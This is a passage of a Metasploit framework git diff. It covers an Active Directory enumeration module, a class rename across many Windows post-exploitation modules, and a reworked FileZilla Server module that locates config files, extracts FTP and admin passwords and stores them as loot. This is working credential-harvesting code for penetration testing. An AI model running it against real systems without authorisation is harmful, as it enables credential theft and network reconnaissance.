'ad_mapping', sql_param_mapping) + end + + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error("Error(Users): #{e.message}") + next + end + end + end + group_gather.map(&:join) + end + + vprint_status "Retrieving computers" + begin + computer_filter = '(objectClass=computer)' + computer_fields = ['distinguishedName', 'objectSid', 'cn', 'dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion', 'description', 'comment'] + computers = query(computer_filter, max_search, computer_fields) + + computers[:results].each do |comp| + computer_rid = get_rid(comp[1][:value]).to_i + + uac_int = comp[8][:value].to_i # Set this because it is used so frequently below + sat_int = comp[4][:value].to_i + + # Add the group to the database + # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx + # Note that userAccountControl is basically the same for a computer as a user; this is because a computer account is derived from a user account + # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one + # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether + # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. + # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx + sql_param_computer = { c_rid: computer_rid, + c_distinguishedName: comp[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_cn: comp[2][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_dNSHostName: comp[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_sAMAccountType: sat_int, + c_sAMAccountName: comp[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_displayName: comp[6][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_logonCount: comp[7][:value].to_i, + c_userAccountControl: uac_int, + c_whenChanged: comp[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_whenCreated: comp[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_primaryGroupID: comp[11][:value].to_i, + c_badPwdCount: comp[12][:value].to_i, + c_operatingSystem: comp[13][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_operatingSystemServicePack: comp[14][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_operatingSystemVersion: comp[15][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_description: comp[16][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + c_comment: comp[17][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + # The login script is executed + c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + # The user account is disabled. + c_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + # The home directory is required. + c_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + # The account is currently locked out. + c_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + # No password is required. + c_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, + # The user cannot change the password. + c_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + # The user can send an encrypted password. + c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + # This is an account for users whose primary account is in another domain. This account + # provides user access to this domain, but not to any domain that trusts this domain. + # Also known as a local user account. + c_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + # This is a default account type that represents a typical user. + c_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + # This is a permit to trust account for a system domain that trusts other domains. + c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + # This is a computer account for a computer that is a member of this domain. + c_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + # This is a computer account for a system backup domain controller that is a member of this domain. + c_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + # The password for this account will never expire. + c_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + # This is an MNS logon account. + c_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + # The user must log on using a smart card. + c_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + # The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. + # Any such service can impersonate a client requesting the service. + c_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + # The security context of the user will not be delegated to a service even if the service + # account is set as trusted for Kerberos delegation. + c_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + # Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. + c_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + # This account does not require Kerberos pre-authentication for logon. + c_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + # The password has expired + c_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + # The account is enabled for delegation. This is a security-sensitive setting; accounts with + # this option enabled should be strictly controlled. This setting enables a service running + # under the account to assume a client identity and authenticate as that user to other remote + # servers on the network. + c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, + # Now add the sAMAccountType objects + c_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0, + c_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0, + c_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0, + c_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0, + c_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0, + c_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0, + c_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0, + c_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0, + c_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0, + c_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0, + c_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0 + } + run_sqlite_query(db, 'ad_computers', sql_param_computer) + print_line "Computer [#{sql_param_computer[:c_cn]}][#{sql_param_computer[:c_dNSHostName]}][#{sql_param_computer[:c_rid]}]" if datastore['SHOW_COMPUTERS'] + end + + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error("Error(Computers): #{e.message}") + return + end + + # Finished enumeration, now safely close the database + if db && db.close + f = ::File.size(dbfile.to_s) + print_status "Database closed: #{dbfile} at #{f} byte(s)" + end + end + + # Run the parameterised SQL query + def run_sqlite_query(db, table_name, values) + sql_param_columns = values.keys + sql_param_bind_params = values.keys.map { |k| ":#{k}" } + db.execute("replace into #{table_name} (#{sql_param_columns.join(',')}) VALUES (#{sql_param_bind_params.join(',')})", values) + end + + # Creat the SQLite Database + def create_sqlite_db + begin + obj_temp = ::Dir::Tmpname + filename = "#{obj_temp.tmpdir}/#{obj_temp.make_tmpname('ad_', 2)}.db" + db = SQLite3::Database.new(filename) + db.type_translation = true + + # Create the table for the AD Computers + db.execute('DROP TABLE IF EXISTS ad_computers') + sql_table_computers = 'CREATE TABLE ad_computers ('\ + 'c_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'c_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'c_cn TEXT,'\ + 'c_sAMAccountType INTEGER,'\ + 'c_sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'c_dNSHostName TEXT,'\ + 'c_displayName TEXT,'\ + 'c_logonCount INTEGER,'\ + 'c_userAccountControl INTEGER,'\ + 'c_primaryGroupID INTEGER,'\ + 'c_badPwdCount INTEGER,'\ + 'c_description TEXT,'\ + 'c_comment TEXT,'\ + 'c_operatingSystem TEXT,'\ + 'c_operatingSystemServicePack TEXT,'\ + 'c_operatingSystemVersion TEXT,'\ + 'c_whenChanged TEXT,'\ + 'c_whenCreated TEXT,'\ + 'c_ADS_UF_SCRIPT INTEGER,'\ + 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'c_ADS_UF_LOCKOUT INTEGER,'\ + 'c_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'c_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'c_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'c_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'c_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'c_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'c_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'c_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'c_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'c_SAM_DOMAIN_OBJECT INTEGER,'\ + 'c_SAM_GROUP_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'c_SAM_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'c_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'c_SAM_TRUST_ACCOUNT INTEGER,'\ + 'c_SAM_APP_BASIC_GROUP INTEGER,'\ + 'c_SAM_APP_QUERY_GROUP INTEGER,'\ + 'c_SAM_ACCOUNT_TYPE_MAX INTEGER)' + db.execute(sql_table_computers) + + # Create the table for the AD Groups + db.execute('DROP TABLE IF EXISTS ad_groups') + sql_table_group = 'CREATE TABLE ad_groups ('\ + 'g_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'g_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'g_sAMAccountType INTEGER,'\ + 'g_sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'g_groupType INTEGER,'\ + 'g_adminCount INTEGER,'\ + 'g_description TEXT,'\ + 'g_comment TEXT,'\ + 'g_cn TEXT,'\ + 'g_managedBy TEXT,'\ + 'g_whenChanged TEXT,'\ + 'g_whenCreated TEXT,'\ + 'g_GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ + 'g_GT_GROUP_SCOPE_GLOBAL INTEGER,'\ + 'g_GT_GROUP_SCOPE_LOCAL INTEGER,'\ + 'g_GT_GROUP_SCOPE_UNIVERSAL INTEGER,'\ + 'g_GT_GROUP_SAM_APP_BASIC INTEGER,'\ + 'g_GT_GROUP_SAM_APP_QUERY INTEGER,'\ + 'g_GT_GROUP_SECURITY INTEGER,'\ + 'g_GT_GROUP_DISTRIBUTION INTEGER,'\ + 'g_SAM_DOMAIN_OBJECT INTEGER,'\ + 'g_SAM_GROUP_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'g_SAM_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'g_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'g_SAM_TRUST_ACCOUNT INTEGER,'\ + 'g_SAM_APP_BASIC_GROUP INTEGER,'\ + 'g_SAM_APP_QUERY_GROUP INTEGER,'\ + 'g_SAM_ACCOUNT_TYPE_MAX INTEGER)' + db.execute(sql_table_group) + + # Create the table for the AD Users + db.execute('DROP TABLE IF EXISTS ad_users') + sql_table_users = 'CREATE TABLE ad_users ('\ + 'u_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'u_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'u_description TEXT,'\ + 'u_displayName TEXT,'\ + 'u_sAMAccountType INTEGER,'\ + 'u_sAMAccountName TEXT,'\ + 'u_logonCount INTEGER,'\ + 'u_userAccountControl INTEGER,'\ + 'u_primaryGroupID INTEGER,'\ + 'u_cn TEXT,'\ + 'u_adminCount INTEGER,'\ + 'u_badPwdCount INTEGER,'\ + 'u_userPrincipalName TEXT UNIQUE,'\ + 'u_comment TEXT,'\ + 'u_title TEXT,'\ + 'u_manager TEXT,'\ + 'u_whenCreated TEXT,'\ + 'u_whenChanged TEXT,'\ + 'u_ADS_UF_SCRIPT INTEGER,'\ + 'u_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'u_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'u_ADS_UF_LOCKOUT INTEGER,'\ + 'u_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'u_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'u_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'u_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'u_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'u_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'u_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'u_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'u_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'u_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'u_SAM_DOMAIN_OBJECT INTEGER,'\ + 'u_SAM_GROUP_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'u_SAM_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'u_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'u_SAM_TRUST_ACCOUNT INTEGER,'\ + 'u_SAM_APP_BASIC_GROUP INTEGER,'\ + 'u_SAM_APP_QUERY_GROUP INTEGER,'\ + 'u_SAM_ACCOUNT_TYPE_MAX INTEGER)' + db.execute(sql_table_users) + + # Create the table for the mapping between the two (membership) + db.execute('DROP TABLE IF EXISTS ad_mapping') + sql_table_mapping = 'CREATE TABLE ad_mapping ('\ + 'user_rid INTEGER NOT NULL,' \ + 'group_rid INTEGER NOT NULL,'\ + 'PRIMARY KEY (user_rid, group_rid),'\ + 'FOREIGN KEY(user_rid) REFERENCES ad_users(u_rid)'\ + 'FOREIGN KEY(group_rid) REFERENCES ad_groups(g_rid))' + db.execute(sql_table_mapping) + + # Create the view for the AD User/Group membership + db.execute('DROP VIEW IF EXISTS view_mapping') + sql_view_mapping = 'CREATE VIEW view_mapping AS SELECT ad_groups.*,ad_users.* FROM ad_mapping '\ + 'INNER JOIN ad_groups ON ad_groups.g_rid = ad_mapping.group_rid '\ + 'INNER JOIN ad_users ON ad_users.u_rid = ad_mapping.user_rid' + db.execute(sql_view_mapping) + + return db, filename + + rescue SQLite3::Exception => e + print_error("Error(Database): #{e.message}") + return + end + end + + def get_rid(data) + sid = data.unpack("bbbbbbbbV*")[8..-1] + sid[-1] + end +end diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index ba5abff56d..101967b452 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index adfafd3529..767fd5660c 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/bitlocker_fvek.rb b/modules/post/windows/gather/bitlocker_fvek.rb index 03406d82a0..a3841f3e74 100644 --- a/modules/post/windows/gather/bitlocker_fvek.rb +++ b/modules/post/windows/gather/bitlocker_fvek.rb @@ -1,6 +1,6 @@ require 'rex/parser/fs/bitlocker' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index f5eebd432c..601de5d6c2 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index 51de3c6061..9499d21457 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index 20c23ca6c3..4482b6f38a 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb index b2be541cdb..2b87c81d3c 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index e58c2a2020..8563952718 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index a90b6d3ac1..c14811d26a 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'metasploit/framework/ntds/parser' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index f1ce358a57..7b57be4c55 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 3a745ee044..cfa9d84987 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb index 9a6f9595cc..339e1d204f 100644 --- a/modules/post/windows/gather/credentials/enum_laps.rb +++ b/modules/post/windows/gather/credentials/enum_laps.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 8d7e09e1f8..68ef4520ac 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 7abf8eb39a..fd8df3bf25 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns/resolver' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 4fd3ca037e..e127602c7c 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File @@ -37,38 +37,61 @@ class Metasploit3 < Msf::Post return end - @progs = "#{session.sys.config.getenv('ProgramFiles')}\\" + progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432') + locations = [] + progfiles_env.each do |k, v| + next if v.blank? + locations << v + "\\FileZilla Server\\" + end - filezilla = check_filezilla + keys = [ + "HKLM\\SOFTWARE\\FileZilla Server", + "HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server", + ] + + keys.each do |key| + begin + root_key, base_key = session.sys.registry.splitkey(key) + value = session.sys.registry.query_value_direct(root_key, base_key, "install_dir") + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + next + end + locations << value.data + "\\" + end + + locations = locations.uniq + filezilla = check_filezilla(locations) get_filezilla_creds(filezilla) if filezilla end - def check_filezilla + def check_filezilla(locations) paths = [] - path = @progs + "FileZilla Server\\" - - print_status("Checking for Filezilla Server directory in: #{path}") - begin - session.fs.dir.entries(path) + locations.each do |location| + print_status("Checking for Filezilla Server directory in: #{location}") + begin + session.fs.dir.foreach("#{location}") do |fdir| + ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| + if fdir == xmlfile + filepath = location + xmlfile + print_good("Configuration file found: #{filepath}") + paths << filepath + end + end + end + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + end rescue ::Exception => e print_error(e.to_s) return end - session.fs.dir.foreach(path) do |fdir| - ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| - if fdir == xmlfile - filepath = path + xmlfile - vprint_status("Configuration file found: #{filepath}") - paths << filepath - end - end - end - if !paths.empty? - print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") + print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{session.sid}") print_line return paths end @@ -160,7 +183,7 @@ class Metasploit3 < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['ftp_port'], service_name: 'ftp', protocol: 'tcp', @@ -189,7 +212,7 @@ class Metasploit3 < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end perms.each do |perm| @@ -201,13 +224,12 @@ class Metasploit3 < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) # report the goods! - if config['ftp_port'] == "<none>" + if config['admin_pass'] == "<none>" vprint_status("Detected Default Adminstration Settings:") - config['ftp_port'] = "21" else vprint_status("Collected the following configuration details:") service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['admin_port'], service_name: 'filezilla-admin', protocol: 'tcp', @@ -235,7 +257,7 @@ class Metasploit3 < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end vprint_status(" FTP Port: #{config['ftp_port']}") @@ -249,31 +271,33 @@ class Metasploit3 < Msf::Post configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'], config['ssl'], config['ssl_certfile'], config['ssl_keypass']] + begin + lastser = parse_interface(fsi_xml) + lastserver << [lastser['ip'], lastser['port'], lastser['password']] + vprint_status("Last Server Information:") + vprint_status(" IP: #{lastser['ip']}") + vprint_status(" Port: #{lastser['port']}") + vprint_status(" Password: #{lastser['password']}") + vprint_line - lastser = parse_interface(fsi_xml) - lastserver << [lastser['ip'], lastser['port'], lastser['password']] - - vprint_status("Last Server Information:") - vprint_status(" IP: #{lastser['ip']}") - vprint_status(" Port: #{lastser['port']}") - vprint_status(" Password: #{lastser['password']}") - vprint_line - - p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, + rescue + vprint_error("Could not parse FileZilla Server Interface.xml") + end + loot_path = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials") - print_status("Credentials saved in: #{p.to_s}") + print_status("Credentials saved in: #{loot_path}") - p = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, + loot_path = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, "filezilla_server_permissions.csv", "FileZilla FTP Server Permissions") - print_status("Permissions saved in: #{p.to_s}") + print_status("Permissions saved in: #{loot_path}") - p = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, + loot_path = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, "filezilla_server_configuration.csv", "FileZilla FTP Server Configuration") - print_status(" Config saved in: #{p.to_s}") + print_status(" Config saved in: #{loot_path}") - p = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, + loot_path = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, "filezilla_server_lastserver.csv", "FileZilla FTP Last Server") - print_status(" Last server history: #{p.to_s}") + print_status(" Last server history: #{loot_path}") print_line end @@ -289,16 +313,16 @@ class Metasploit3 < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") end opt = doc.elements.to_a("Settings/Item") if 